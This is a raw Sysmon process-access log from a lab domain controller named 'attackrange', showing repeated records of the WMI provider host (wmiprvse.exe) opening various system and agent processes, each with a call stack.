16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.577{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.562{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 